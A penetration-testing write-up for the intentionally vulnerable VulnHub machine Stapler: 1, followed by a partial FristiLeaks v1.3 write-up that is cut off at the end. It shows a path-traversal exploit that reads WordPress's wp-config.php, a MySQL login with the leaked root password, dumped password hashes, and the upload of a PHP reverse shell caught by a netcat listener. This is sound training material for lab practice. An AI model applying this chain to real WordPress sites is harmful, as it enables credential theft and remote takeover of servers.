Write-up for Stapler: 1 – A Different Path


This post is an addendum to my recent article on the Write-up for Stapler: 1. In the original post, I gained a low privilege shell using credentials which I obtained through SMB enumeration.

Remember I mentioned that I have not looked into port 3306 and 12380 yet and will look into them when I have some time? And I did — over the last weekend ūüôā

Once again, the short intro: Stapler: 1 is a vulnerable machine created by g0tmi1k and downloadable for free on VulnHub. It is a very good practice machine if you are pursuing the OSCP certification. (read about my OSCP journey).

Enumeration on port 3306

The following was discovered through the initial nmap scan:

3306/tcp  open  mysql       MySQL 5.7.12-0ubuntu1

Let’s try to connect to the service using netcat:

nc 3306

It looks weird though. Let’s leave it at where it is for now.

Enumeration on port 12380

This could potentially be one of the most interesting lead on the list since it is a custom HTTP server hosted on a non-common port.

12380/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))


This is pretty interesting. Since the website is currently still unfinished, it should have left some bad implementation somewhere.

Checked the page source, nothing interesting except for the message that mentioned the name of the HR person, Zoe:

<!– A message from the head of our HR department, Zoe, if you are looking at this, we want to hire you! –>

Since I already got all the potential usernames through SMB service, this piece of name is as useful, but definitely, note it down and move on.

Let’s run dirb on this web application:

DIRB v2.22
By The Dark Raver
START_TIME: Sun Dec 17 18:12:10 2017
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
—- Scanning URL: —-
END_TIME: Sun Dec 17 18:14:27 2017

Surprisingly, there was nothing found.

Now, let’s run nikto on it as well:

+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ Entry ‘/admin112233/’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry ‘/blogblog/’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ “robots.txt” contains 2 entries which should be manually viewed.
+ Hostname ‘’ does not match certificate’s names: Red.Initech
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found

Looks like we found something interesting now ūüôā


The scan result is very useful. Now it is time to manually verify these sites:

  • /admin112233
  • /blogblog
  • /phpmyadmin

Note: we need to visit these websites via HTTPS protocol, or you will get redirected and will not be able to see the content ūüôā

‚Äč‚Äč‚Äčrobots.txt is¬†showing some interesting results! —¬†


PhpMyAdmin login console is exposed! —


So, apparently /admin112233 is meant to educate people and let them know about the possibility of being lured into a honeypot (such as this page) and get “hacked back” in return. Nice one! —


WordPress blog! This definitely the one which we saw earlier in the SMB share drive’s backup folder —¬†


After checking out the blog posts and taking the hints, let’s run wpscan to check out the installed plugins:

wpscan –url –disable-tls-checks
        __          _______   _____
        \ \        / /  __ \ / ____|
¬†¬†¬†¬†¬†¬†¬†¬†¬†\ \¬†¬†/\¬†¬†/ /| |__) | (___¬†¬†¬†___¬†¬†__ _ _ __ ¬ģ
¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†\ \/¬†¬†\/ / |¬†¬†___/ \___ \ / __|/ _` | ‘_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|
        WordPress Security Scanner by the WPScan Team
                       Version 2.9.2
          Sponsored by Sucuri Рhttps://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
[+] Started: Sun Dec 17 18:36:58 2017
[!] The WordPress ‘’; file exists exposing a version number
[+] Interesting header: DAVE: Soemthing doesn’t look right here
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[+] XML-RPC Interface available under:
[!] Upload directory has directory listing enabled:
[!] Includes directory has directory listing enabled:
[+] WordPress version 4.2.1 (Released on 2015-04-27) identified from advanced fingerprinting, meta generator, readme, links opml, stylesheets numbers
[!] 49 vulnerabilities identified from the version number
[!] Title: WordPress 4.1-4.2.1 – Unauthenticated Genericons Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/7979
    Reference: https://codex.wordpress.org/Version_4.2.2
[i] Fixed in: 4.2.2
[!] Title: WordPress <= 4.2.2 – Authenticated Stored Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8111
    Reference: https://klikki.fi/adv/wordpress3.html
[i] Fixed in: 4.2.3
[!] Title: WordPress <= 4.2.3 – wp_untrash_post_comments SQL Injection
    Reference: https://wpvulndb.com/vulnerabilities/8126
[i] Fixed in: 4.2.4
[!] Title: WordPress <= 4.2.3 – Timing Side Channel Attack
    Reference: https://wpvulndb.com/vulnerabilities/8130
[i] Fixed in: 4.2.4
[!] Title: WordPress <= 4.2.3 – Widgets Title Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8131
[i] Fixed in: 4.2.4
[!] Title: WordPress <= 4.2.3 – Nav Menu Title Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8132
[i] Fixed in: 4.2.4
[!] Title: WordPress <= 4.2.3 – Legacy Theme Preview Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8133
[i] Fixed in: 4.2.4
[!] Title: WordPress <= 4.3 – Authenticated Shortcode Tags Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8186
[i] Fixed in: 4.2.5
[!] Title: WordPress <= 4.3 – User List Table Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8187
[i] Fixed in: 4.2.5
[!] Title: WordPress <= 4.3 – Publish Post & Mark as Sticky Permission Issue
    Reference: https://wpvulndb.com/vulnerabilities/8188
[i] Fixed in: 4.2.5
[!] Title: WordPress  3.7-4.4 РAuthenticated Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8358
[i] Fixed in: 4.2.6
[!] Title: WordPress 3.7-4.4.1 – Local URIs Server Side Request Forgery (SSRF)
    Reference: https://wpvulndb.com/vulnerabilities/8376
    Reference: https://hackerone.com/reports/110801
[i] Fixed in: 4.2.7
[!] Title: WordPress 3.7-4.4.1 – Open Redirect
    Reference: https://wpvulndb.com/vulnerabilities/8377
[i] Fixed in: 4.2.7
[!] Title: WordPress <= 4.4.2 – SSRF Bypass using Octal & Hexedecimal IP addresses
    Reference: https://wpvulndb.com/vulnerabilities/8473
    Reference: https://codex.wordpress.org/Version_4.5
[i] Fixed in: 4.5
[!] Title: WordPress <= 4.4.2 – Reflected XSS in Network Settings
    Reference: https://wpvulndb.com/vulnerabilities/8474
    Reference: https://codex.wordpress.org/Version_4.5
[i] Fixed in: 4.5
[!] Title: WordPress <= 4.4.2 – Script Compression Option CSRF
    Reference: https://wpvulndb.com/vulnerabilities/8475
    Reference: https://codex.wordpress.org/Version_4.5
[i] Fixed in: 4.5
[!] Title: WordPress 4.2-4.5.1 – MediaElement.js Reflected Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8488
[i] Fixed in: 4.5.2
[!] Title: WordPress <= 4.5.1 – Pupload Same Origin Method Execution (SOME)
    Reference: https://wpvulndb.com/vulnerabilities/8489
    Reference: http://avlidienbrunn.com/wp_some_loader.php
[i] Fixed in: 4.2.8
[!] Title: WordPress 4.2-4.5.2 – Authenticated Attachment Name Stored XSS
    Reference: https://wpvulndb.com/vulnerabilities/8518
[i] Fixed in: 4.2.9
[!] Title: WordPress 3.6-4.5.2 – Authenticated Revision History Information Disclosure
    Reference: https://wpvulndb.com/vulnerabilities/8519
[i] Fixed in: 4.2.9
[!] Title: WordPress 2.6.0-4.5.2 – Unauthorized Category Removal from Post
    Reference: https://wpvulndb.com/vulnerabilities/8520
[i] Fixed in: 4.2.9
[!] Title: WordPress 2.5-4.6 – Authenticated Stored Cross-Site Scripting via Image Filename
    Reference: https://wpvulndb.com/vulnerabilities/8615
    Reference: http://seclists.org/fulldisclosure/2016/Sep/6
[i] Fixed in: 4.2.10
[!] Title: WordPress 2.8-4.6 – Path Traversal in Upgrade Package Uploader
    Reference: https://wpvulndb.com/vulnerabilities/8616
[i] Fixed in: 4.2.10
[!] Title: WordPress 2.9-4.7 – Authenticated Cross-Site scripting (XSS) in update-core.php
    Reference: https://wpvulndb.com/vulnerabilities/8716
[i] Fixed in: 4.2.11
[!] Title: WordPress 3.4-4.7 – Stored Cross-Site Scripting (XSS) via Theme Name fallback
    Reference: https://wpvulndb.com/vulnerabilities/8718
[i] Fixed in: 4.2.11
[!] Title: WordPress <= 4.7 – Post via Email Checks mail.example.com by Default
    Reference: https://wpvulndb.com/vulnerabilities/8719
[i] Fixed in: 4.2.11
[!] Title: WordPress 2.8-4.7 – Accessibility Mode Cross-Site Request Forgery (CSRF)
    Reference: https://wpvulndb.com/vulnerabilities/8720
[i] Fixed in: 4.2.11
[!] Title: WordPress 3.0-4.7 – Cryptographically Weak Pseudo-Random Number Generator (PRNG)
    Reference: https://wpvulndb.com/vulnerabilities/8721
[i] Fixed in: 4.2.11
[!] Title: WordPress 4.2.0-4.7.1 – Press This UI Available to Unauthorised Users
    Reference: https://wpvulndb.com/vulnerabilities/8729
[i] Fixed in: 4.2.12
[!] Title: WordPress 3.5-4.7.1 – WP_Query SQL Injection
    Reference: https://wpvulndb.com/vulnerabilities/8730
[i] Fixed in: 4.2.12
[!] Title: WordPress 3.6.0-4.7.2 – Authenticated Cross-Site Scripting (XSS) via Media File Metadata
    Reference: https://wpvulndb.com/vulnerabilities/8765
    Reference: http://seclists.org/oss-sec/2017/q1/563
[i] Fixed in: 4.2.13
[!] Title: WordPress 2.8.1-4.7.2 – Control Characters in Redirect URL Validation
    Reference: https://wpvulndb.com/vulnerabilities/8766
[i] Fixed in: 4.2.13
[!] Title: WordPress  4.0-4.7.2 РAuthenticated Stored Cross-Site Scripting (XSS) in YouTube URL Embeds
    Reference: https://wpvulndb.com/vulnerabilities/8768
[i] Fixed in: 4.2.13
[!] Title: WordPress 4.2-4.7.2 – Press This CSRF DoS
    Reference: https://wpvulndb.com/vulnerabilities/8770
    Reference: http://seclists.org/oss-sec/2017/q1/562
    Reference: https://hackerone.com/reports/153093
[i] Fixed in: 4.2.13
[!] Title: WordPress 2.3-4.8.3 – Host Header Injection in Password Reset
    Reference: https://wpvulndb.com/vulnerabilities/8807
    Reference: https://core.trac.wordpress.org/ticket/25239
[!] Title: WordPress 2.7.0-4.7.4 – Insufficient Redirect Validation
    Reference: https://wpvulndb.com/vulnerabilities/8815
[i] Fixed in: 4.2.15
[!] Title: WordPress 2.5.0-4.7.4 – Post Meta Data Values Improper Handling in XML-RPC
    Reference: https://wpvulndb.com/vulnerabilities/8816
[i] Fixed in: 4.2.15
[!] Title: WordPress 3.4.0-4.7.4 – XML-RPC Post Meta Data Lack of Capability Checks
    Reference: https://wpvulndb.com/vulnerabilities/8817
[i] Fixed in: 4.2.15
[!] Title: WordPress 2.5.0-4.7.4 – Filesystem Credentials Dialog CSRF
    Reference: https://wpvulndb.com/vulnerabilities/8818
[i] Fixed in: 4.2.15
[!] Title: WordPress 3.3-4.7.4 – Large File Upload Error XSS
    Reference: https://wpvulndb.com/vulnerabilities/8819
    Reference: https://hackerone.com/reports/203515
    Reference: https://hackerone.com/reports/203515
[i] Fixed in: 4.2.15
[!] Title: WordPress 3.4.0-4.7.4 – Customizer XSS & CSRF
    Reference: https://wpvulndb.com/vulnerabilities/8820
[i] Fixed in: 4.2.15
[!] Title: WordPress 2.3.0-4.8.1 – $wpdb->prepare() potential SQL Injection
    Reference: https://wpvulndb.com/vulnerabilities/8905
[i] Fixed in: 4.2.16
[!] Title: WordPress 2.3.0-4.7.4 – Authenticated SQL injection
    Reference: https://wpvulndb.com/vulnerabilities/8906
    Reference: https://wpvulndb.com/vulnerabilities/8905
[i] Fixed in: 4.7.5
[!] Title: WordPress 2.9.2-4.8.1 – Open Redirect
    Reference: https://wpvulndb.com/vulnerabilities/8910
[i] Fixed in: 4.2.16
[!] Title: WordPress 3.0-4.8.1 – Path Traversal in Unzipping
    Reference: https://wpvulndb.com/vulnerabilities/8911
[i] Fixed in: 4.2.16
[!] Title: WordPress <= 4.8.2 – $wpdb->prepare() Weakness
    Reference: https://wpvulndb.com/vulnerabilities/8941
[i] Fixed in: 4.2.17
[!] Title: WordPress 2.8.6-4.9 – Authenticated JavaScript File Upload
    Reference: https://wpvulndb.com/vulnerabilities/8966
[i] Fixed in: 4.2.18
[!] Title: WordPress 1.5.0-4.9 – RSS and Atom Feed Escaping
    Reference: https://wpvulndb.com/vulnerabilities/8967
[i] Fixed in: 4.2.18
[!] Title: WordPress 3.7-4.9 – ‘newbloguser’ Key Weak Hashing
    Reference: https://wpvulndb.com/vulnerabilities/8969
[i] Fixed in: 4.2.18
[+] WordPress theme in use: bhost – v1.2.9
[+] Name: bhost – v1.2.9
[!] The version is out of date, the latest version is 1.3.9
|  Theme Name: BHost
|  Theme URI: Author: Masum Billah
|¬†¬†Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This the…
|  Author: Masum Billah
|  Author URI: http://getmasum.net/
[+] Enumerating plugins from passive detection …
[+] No plugins found

Noticed anything strange? Yes, while there were 49 vulnerabilities identified in total, the output says “No plugins found”. How is that possible? The blog posts already stated that they have installed some new plugins!

Truth to be told, this is the ideal example of what it means when people tell you not to blindly rely on tools.

Let’s specifically run only the plugins enumeration function:

wpscan –url –disable-tls-checks –enumerate p
[+] Enumerating installed plugins (only ones marked as popular) …
   Time: 00:00:06 <=========================> (1411 / 1411) 100.00% Time: 00:00:06
[+] We found 2 plugins:
[+] Name: akismet
|  Latest version: 4.0.1
[!] We could not determine a version so all vulnerabilities are printed out
[!] Title: Akismet 2.5.0-3.1.4 – Unauthenticated Stored Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8215
[i] Fixed in: 3.1.5
[+] Name: shortcode-ui – v0.6.2
[!] The version is out of date, the latest version is 0.7.3

2 plugins found! This looks much better. What about users?

wpscan –url –disable-tls-checks –enumerate u
[+] Enumerating usernames …
[+] Identified the following 10 user/s:
    | Id | Login   | Name            |
    | 1  | john    | John Smith      |
    | 2  | elly    | Elly Jones      |
    | 3  | peter   | Peter Parker    |
    | 4  | barry   | Barry Atkins    |
    | 5  | heather | Heather Neville |
    | 6  | garry   | garry           |
    | 7  | harry   | harry           |
    | 8  | scott   | scott           |
    | 9  | kathy   | kathy           |
    | 10 | tim     | tim             |

A better visualisation of the table:


Use the following command to do a very thorough plugin scan – it may take some time — it took me around 12 minutes to finish the scan. But the result¬†is worth the wait!

wpscan –url –disable-tls-checks –enumerate ap
[+] Enumerating all plugins (may take a while and use a lot of system resources) …
   Time: 00:11:58 <=======================> (71551 / 71551) 100.00% Time: 00:11:58
[+] We found 4 plugins:
[+] Name: advanced-video-embed-embed-videos-or-playlists – v1.0
|  Latest version: 1.0 (up to date)
[+] Name: akismet
|  Latest version: 4.0.1
[!] We could not determine a version so all vulnerabilities are printed out
[!] Title: Akismet 2.5.0-3.1.4 – Unauthenticated Stored Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8215
[i] Fixed in: 3.1.5
[+] Name: shortcode-ui – v0.6.2
[!] The version is out of date, the latest version is 0.7.3
[+] Name: two-factor
|  Latest version: 0.1-dev-20171206

Nice, there were 4 vulnerable plugins found!

Now, we check whether there is any public exploit available on exploit-db.com


Great! Next, we copy the file to our local directory for analysis.

cp /usr/share/exploitdb/platforms/php/webapps/39646.py .
ls -l 39646.py
-rwxr-xr-x 1 root root 1772 May 14 22:58 39646.py

After a quick look at the exploit, it is clear that it will basically print the content of wp-config.php, which is the default configuration file of WordPress).

Not many modification were required, just insert the correct URL:

url = “; # insert url to wordpress

However, running the exploit would run into error:

python 39646.py
Traceback (most recent call last):
¬†¬†File “39646.py”, line 41, in <module>
¬†¬†¬†¬†objHtml = urllib2.urlopen(url + ‘/wp-admin/admin-ajax.php?action=ave_publishPost&title=’ + str(randomID) + ‘&short=rnd&term=rnd&thumb=../wp-config.php’)
¬†¬†File “/usr/lib/python2.7/urllib2.py”, line 154, in urlopen
    return opener.open(url, data, timeout)
¬†¬†File “/usr/lib/python2.7/urllib2.py”, line 429, in open
    response = self._open(req, data)
¬†¬†File “/usr/lib/python2.7/urllib2.py”, line 447, in _open
¬†¬†¬†¬†‘_open’, req)
¬†¬†File “/usr/lib/python2.7/urllib2.py”, line 407, in _call_chain
    result = func(*args)
¬†¬†File “/usr/lib/python2.7/urllib2.py”, line 1241, in https_open
¬†¬†File “/usr/lib/python2.7/urllib2.py”, line 1198, in do_open
    raise URLError(err)
urllib2.URLError: <urlopen error [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:590)>

After some quick research, I have managed to find a simple patch to this issue on a Stack Overflow thread: http://stackoverflow.com/questions/27835619/ssl-certificate-verify-failed-error

Simply make a small modification to add the following:

import ssl
ssl._create_default_https_context = ssl._create_unverified_context

The following is the full modified exploit that you can run, just need to replace your own WordPress instance on line 40:


Let’s run the exploit again:

python 39646.py
–2017-05-14 23:18:38–¬†¬†
Connecting to… connected.
WARNING: The certificate of ‚Äė192.168.1.30‚Äô is not trusted.
WARNING: The certificate of ‚Äė192.168.1.30‚Äô hasn’t got a known issuer.
The certificate’s owner does not match hostname ‚Äė192.168.1.30‚Äô
HTTP request sent, awaiting response… 200 OK
Length: 3042 (3.0K) [image/jpeg]
Saving to: ‚Äė1527501269.jpeg‚Äô
1527501269.jpeg¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†100%[============================================================================================================>]¬†¬†¬†2.97K¬†¬†–.-KB/s¬†¬†¬†¬†in 0s
2017-05-14 23:18:38 (78.4 MB/s) – ‚Äė1527501269.jpeg‚Äô saved [3042/3042]
Now, we check the JPG file that we have downloaded using the exploit:
ls -la 1527501269.jpeg
-rw-r–r– 1 root root 3042 May 14 23:15 1527501269.jpeg

Now we check the type of the JPG file using file:

file 1527501269.jpeg
1527501269.jpeg: PHP script, ASCII text

PHP script! Cool. Now we read its content:

cat 1527501269.jpeg
* The base configurations of the WordPress.
* This file has the following configurations: MySQL settings, Table Prefix,
* Secret Keys, and ABSPATH. You can find more information by visiting
* Codex page. You can get the MySQL settings from your web host.
* This file is used by the wp-config.php creation script during the
* installation. You don’t have to use the web site, you can just copy this file
* to “wp-config.php” and fill in the values.
* @package WordPress
// ** MySQL settings – You can get this info from your web host ** //
/** The name of the database for WordPress */
define(‘DB_NAME’, ‘wordpress’);
/** MySQL database username */
define(‘DB_USER’, ‘root’);
/** MySQL database password */
define(‘DB_PASSWORD’, ‘plbkac’);
/** MySQL hostname */
define(‘DB_HOST’, ‘localhost’);
/** Database Charset to use in creating database tables. */
define(‘DB_CHARSET’, ‘utf8mb4’);
/** The Database Collate type. Don’t change this if in doubt. */
define(‘DB_COLLATE’, ”);
* Authentication Unique Keys and Salts.
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
* @since 2.6.0
define(‘AUTH_KEY’,¬†¬†¬†¬†¬†¬†¬†¬†¬†‘V 5p=[.Vds8~SX;>t)++Tt57U6{Xe`T|oW^eQ!mHr }]>9RX07W<sZ,I~`6Y5-T:’);
define(‘LOGGED_IN_KEY’,¬†¬†¬†¬†‘ql-Vfg[?v6{ZR*+O)|Hf OpPWYfKX0Jmpl8zU<cr.wm?|jqZH:YMv;zu@tM7P:4o’);
define(‘SECURE_AUTH_SALT’, ‘.HJmx^zb];5P}hM-uJ%^+9=0SBQEh[[*>#z+p>nVi10`XOUq (Zml~op3SG4OG_D’);
* WordPress Database Table prefix.
* You can have multiple installations in one database if you give each a unique
* prefix. Only numbers, letters, and underscores please!
$table_prefix¬†¬†= ‘wp_’;
* For developers: WordPress debugging mode.
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
define(‘WP_DEBUG’, false);
/* That’s all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( !defined(‘ABSPATH’) )
define(‘ABSPATH’, dirname(__FILE__) . ‘/’);
/** Sets up WordPress vars and included files. */
require_once(ABSPATH . ‘wp-settings.php’);
define(‘WP_HTTP_BLOCK_EXTERNAL’, true);

Now we have the credentials for MySQL!

mysql -uroot -pplbkac -h
Warning: Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 48
Server version: 5.7.12-0ubuntu1 (Ubuntu)
Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.
mysql> show databases;
| Database           |
| information_schema |
| loot               |
| mysql              |
| performance_schema |
| phpmyadmin         |
| proof              |
| sys                |
| wordpress          |
8 rows in set (0.01 sec)
mysql> use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
| Tables_in_wordpress   |
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
11 rows in set (0.00 sec)

Check out the wp-users table:

Now we check the list of users stored in this table:

mysql> select user_login,user_pass from wp_users;
| user_login | user_pass                          |
| John       | $P$B7889EMq/erHIuZapMB8GEizebcIy9. |
| Elly       | $P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0 |
| Peter      | $P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0 |
| barry      | $P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0 |
| heather    | $P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10 |
| garry      | $P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1 |
| harry      | $P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0 |
| scott      | $P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1 |
| kathy      | $P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0 |
| tim        | $P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0 |
| ZOE        | $P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1 |
| Dave       | $P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy. |
| Simon      | $P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0 |
| Abby       | $P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs. |
| Vicki      | $P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131 |
| Pam        | $P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0 |
16 rows in set (0.00 sec)
mysql> exit

Great, now we have a list of password hashes! Next is to crack the password using john:

john –show hashes.txt
11 password hashes cracked, 5 left

In this case, there is no need to wait for all the password hashes to be cracked because if you understand a WordPressapplication, usually the very first record in the user table is the admin account. In this case, the first record is John and we already have his password: incorrect

Using the following credentials, I was able to login to the WordPress application as an admin user:

username: john
password: incorrect

Next, go to Plugins and upload a Web Shell, such as the very famous Pentestmonkey’s PHP reverse shell¬†which is also available on your Kali Linux machine by default at /usr/share/webshells/php/php-reverse-shell.php

Modify the ip and port parameters on line 49 and 50 and you are good to go.

Save it as reverse.php and upload it as a new Plugin.

Now, set up a netcat listener on the local port 4444 to catch the reverse shell from the Stapler machine.

nc -nlvp 4444
listening on [any] 4444 …

Now, visit to trigger the reverse shell connection.

Observe the changes below on your host machine:

nc -lvnp 4444
listening on [any] 443 …
connect to [] from (UNKNOWN) [] 36962
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux 16:08:13 up 1 day,  1:59,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)/bin/sh: 0: can’t access tty; job control turned off
$ pwd
$ uname -a
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux

With this, we have successfully gained entry using an alternative path of gaining low privilege shell through exploiting a vulnerable WordPress plugin to obtain its configuration file, obtained the SQL credentials to dump user password hashes, gain access to WordPress admin user account and uploaded a reverse shell.

I hope you enjoyed reading this write-up.

If you like this post, please check out my other similar write-ups as well:


Write-up for FristiLeaks v1.3 [VulnHub]

To celebrate the end of 2017, I have decided to do a write-up on a VulnHub virtual machine (VM) like what I did for the Writeup for the Kioptrix series.

It has proved to be an effective exercise because apart from improving my writing and explanation skills, I also get to refresh the technical skills and techniques which I learnt previously while studying for my OSCP certification exams. Do read my OSCP/PWK course review if you are intending to take your OSCP certification exams in 2018!

Practice makes perfect
Practice makes perfect

As mentioned previously during my very first VulnHub write-up, the VMs on VulnHub were designed to be vulnerable, specifically created for security researchers or any security enthusiasts to conduct security testing on them. It is a good way to test your technical skills from identifying vulnerabilities when you encounter one, to crafting your own exploits or getting publicly available Proof of Concept (POC) to work.

Setting up

In this write-up, we will be working on the¬†FristiLeaks v1.3. Before we get started, let’s manually modify the VM’s MAC address to 08:00:27:A5:A6:76 as per instructed by the author.

Steps for VMware Workstation users to modify MAC Address
Instructions for VMware Workstation users to modify MAC Address
Written instructions for VMware Workstation users:
  1. Import the OVA
  2. Click on Edit virtual machine settings
  3. Under Hardware tab, click on Network Adapter
  4. On the right section of the window, click on Advanced
  5. In the pop-out window, insert the MAC address which the VM creator has instructed.

That’s it, now you can launch the VM.

FristiLeaks v1.3
FristiLeaks v1.3

Please note that for the sake of writing this article, I have changed my VM’s Network Adapter settings to NAT instead of the default “Bridged“, but there should be no difference for you to keep up with the write-up.

Host discovery

netdiscover -r


Looks like our target has been found to be hosted on Do you find the MAC address familiar in some ways? 08:00:27:a5:a6:76      1      60  PCS Systemtechnik GmbH

Service Discovery 

nmap -sS -Pn -T4 -p-

Starting Nmap 7.50 ( https://nmap.org ) at 2017-12-16 22:59 +08
Nmap scan report for
Host is up (0.00038s latency).
Not shown: 65534 filtered ports
80/tcp open  http
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)


Enumeration – port 80

Interesting, there is only 1 open port.¬† Let’s scan the port 80 specifically using scripts:

nmap -A -O -p80

Starting Nmap 7.50 ( https://nmap.org ) at 2017-12-16 23:21 +08
Nmap scan report for
Host is up (0.00029s latency).

80/tcp open  http    Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
| http-methods:
|_  Potentially risky methods: TRACE
| http-robots.txt: 3 disallowed entries
|_/cola /sisi /beer
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)


Now let’s manually check the web server running on port 80:


For the sake of clarity, you may also want to verify the robots.txt disallowed entries that were identified by nmap. But trust me, nmap’s script is pretty accurate. ūüôā


At this point, my¬†thought was — if this is the entry to gain access to the system, then this machine might be a little too simple. It cannot be so simple.


As expected!! All the 3 entries have brought us to the above meme.

Since all the 3 entries were deadends, let’s run our directory buster.


---- Scanning URL: ----
+ (CODE:403|SIZE:210)                                 
+ (CODE:200|SIZE:703)                               
+ (CODE:200|SIZE:62)                                
---- Entering directory: ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)

Nothing interesting found except for the directory listing of images:


Only 2 images. Now, on second thoughts, the pink colour keep-calm image seems to be a hint, since it says,


There were pages for Cola, Sisi and Beer. What about Fristi, since it is also a form of drinking beverage?

Let’s visit


Wow. Just, wow. It’s actually there. There is this hidden admin portal with a very badly designed login form which has auto-complete feature being enabled in both input fields.¬†(yeah, including the password).


And there is this guy in the image that is going “Ha Ha” …

Moving on, let’s run the directory buster again.


---- Scanning URL: ----
+ (CODE:200|SIZE:134605)                      
==> DIRECTORY:                                                                                      

---- Entering directory: ----
+ (CODE:200|SIZE:4)  

We found something! BUT¬†it looks like kind of a dead-end… at least for now.


Since there is nothing else here, let’s go back and view the page source of the login page.

As my colleague,¬†Sven,¬†has always told me when we are working on a project — always view the page source, never trust the rendered output.

It’s very well said, as I have found several vulnerabilities on web applications that messed up because some developers did not expect their users to either view the page source on their web browser (e.g. Firefox users can right-click, view page source) or view the HTTP responses directly on a HTTP proxy server.

Back to the write-up — indeed, the page source has several interesting stuff. For example, the meta description content is hilarious:

super leet password login-test page. We use base64 encoding for images so they are inline in the HTML. I read somewhere on the web, that thats a good way to do it.

Also, the TODO comments are very interesting as well:


There are two things that I can infer from reading this TODO list: There are two things that I could infer from reading this TODO list:

  1. “eezeepz” is the name of the developer who created this application.
  2. He is the type who write notes within the application. Assuming he uses “eezeepz” as his username, what could the password be?

Going further down the page source, we can see that there is another chunk of base64 encoded content that was commented.


Well, what could it be? ūüôā

To decode the base64 encoded content, I used nano to make the content into a single line. It can be any other tools that you like РI need it to be a single line so I can conveniently use my terminal to run a command to decode it.

base64 -d /tmp/encoded.txt


Wow. Apparently, it is a PNG image file, as you can see in the very first line of characters. Seems like it somehow links back to the meta description content of “using base64 encoding for images”.

First, we save it as a PNG file.

base64 -d /tmp/encoded.txt > decoded.png

Next, we render it and see what is in the image. Again, you can use any tools to do this. For me, I like to use feh.

feh decoded.png


Interesting… for some reason, the only correlation of things that I can use for this set of characters is probably someone’s password…

Let’s try the following credentials on the login form:


Bingo!! Finally some progress!


Looks like the only available function is the upload file feature. Now what? let’s conveniently upload a PHP reverse shell!

Gaining Low Privilege Access Shell

Simply modify and use the one from kali. If you are not using kali, you can download the reverse shell source code here, created by pentestmonkey.

cp /usr/share/webshells/php/php-reverse-shell.php reverse-shell.php
